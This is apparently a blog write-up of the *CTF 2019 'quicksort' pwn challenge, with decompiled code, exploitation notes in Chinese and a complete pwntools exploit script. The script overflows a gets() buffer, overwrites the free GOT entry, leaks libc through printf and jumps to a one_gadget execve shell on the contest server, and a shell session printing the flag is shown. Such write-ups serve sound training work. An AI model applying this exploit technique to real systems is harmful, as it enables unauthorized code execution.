StarCTF
*CTF2019
pwn
shellcode
check
Thought
Solution
###quicksort
check
checksec quicksort
[*] '/ctf/work/star/quicksort/quicksort'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)check ida
unsigned int main2()
{
int *v0; // ebx
char s; // [esp+Ch] [ebp-2Ch]
char v3; // [esp+Dh] [ebp-2Bh]
char v4; // [esp+Eh] [ebp-2Ah]
char v5; // [esp+Fh] [ebp-29h]
char v6; // [esp+10h] [ebp-28h]
char v7; // [esp+11h] [ebp-27h]
char v8; // [esp+12h] [ebp-26h]
char v9; // [esp+13h] [ebp-25h]
char v10; // [esp+14h] [ebp-24h]
char v11; // [esp+15h] [ebp-23h]
char v12; // [esp+16h] [ebp-22h]
char v13; // [esp+17h] [ebp-21h]
char v14; // [esp+18h] [ebp-20h]
char v15; // [esp+19h] [ebp-1Fh]
char v16; // [esp+1Ah] [ebp-1Eh]
char v17; // [esp+1Bh] [ebp-1Dh]
int v18; // [esp+1Ch] [ebp-1Ch]
int i; // [esp+20h] [ebp-18h]
int j; // [esp+24h] [ebp-14h]
void *ptr; // [esp+28h] [ebp-10h]
unsigned int v22; // [esp+2Ch] [ebp-Ch]
v22 = __readgsdword(0x14u);
v3 = 0;
v4 = 0;
v5 = 0;
v6 = 0;
v7 = 0;
v8 = 0;
v9 = 0;
v10 = 0;
v11 = 0;
v12 = 0;
v13 = 0;
v14 = 0;
v15 = 0;
v16 = 0;
v17 = 0;
s = 0;
v18 = 0;
puts("how many numbers do you want to sort?");
__isoc99_scanf("%d", &v18);
getchar();
ptr = malloc(4 * v18);
for ( i = 0; i < v18; ++i )
{
printf("the %dth number:", i + 1);
gets(&s);
v0 = (int *)((char *)ptr + 4 * i);
*v0 = atoi(&s);
}
sort1((int)ptr, 0, v18 - 1);
puts("Here is the result:");
for ( j = 0; j < v18; ++j )
printf("%d ", *((_DWORD *)ptr + j));
puts(&byte_8048AD2);
free(ptr);
return __readgsdword(0x14u) ^ v22;
}Thought
-
字符数组的s溢出可以覆盖ptr, i, j 。
-
改free_got到main_txt,目的用于重复输入
-
利用printf(“%d”)来泄漏 函数在got表的真实地址,得到libc基地址
-
one_gadget寻找execv
-
0x3ac5c execve("/bin/sh", esp+0x28, environ) constraints: esi is the GOT address of libc [esp+0x28] == NULL 0x3ac5e execve("/bin/sh", esp+0x2c, environ) constraints: esi is the GOT address of libc [esp+0x2c] == NULL 0x3ac62 execve("/bin/sh", esp+0x30, environ) constraints: esi is the GOT address of libc [esp+0x30] == NULL -
修改free_got到one,然后成功pwn掉。
root@prime:/ctf/work/star/quicksort# ./p.py
[+] Opening connection to 34.92.96.238 on port 10000: Done
[+] -136733602
[*] Switching to interactive mode
Here is the result:
$ ls
chall
flag
pwn
$ cat flag
*CTF{lSkR5u3LUh8qTbaCINgrjdJ74iE9WsDX}Solution
#!/usr/bin/env python
from pwn import *
import ctypes
#p = process('./quicksort')
#nc 34.92.96.238 10000
p = remote('34.92.96.238',10000)
debug = 0
if debug:
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
gdb.attach(p)
libc_start_got = 0x804a030
#[0x804a018] free
main2_addr = 0x8048816 #134514710
free_got = 0x804a018
puts_got = 0x804a02c
puts_plt = 0x8048560 #134514016
printf_plt = 0x80484f0 #134513904
puts_libc = 0x5fca0
one = 0x3ac5e#0x3ac62
p.sendlineafter('to sort?','1')
pay = str(main2_addr)+'\x00'+'\x00'*(0x2c-0xa-0x1c)+p32(1)+p32(0)+p32(0)+p32(free_got)
p.sendlineafter('number:',pay)
p.sendlineafter('to sort?','1')
pay = str(printf_plt)+'\x00'+'\x00'*(0x2c-0xa-0x1c)+p32(1)+p32(1)+p32(0)+p32(puts_got)
p.sendlineafter('number:',pay)
p.recvline()
x = ctypes.c_uint(int(p.recvline())).value
one_real = x + one-puts_libc
one_real = ctypes.c_int(one_real).value
#print len(str(one_real))
log.success(one_real)
p.sendlineafter('to sort?','1')
pay = str(one_real)+'\x00'*(0x2c-0xa-0x1c)+p32(0)+p32(0)+p32(0)+p32(free_got)#+'\x00'*100
p.sendlineafter('number:',pay)
p.interactive()x
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论。
文章标题:StarCTF
本文作者:枫云李
发布时间:2019-04-29, 00:00:00
最后更新:2020-04-11, 01:13:45
原始链接:https://primelyw.github.io/2019/04/29/StarCTF/版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。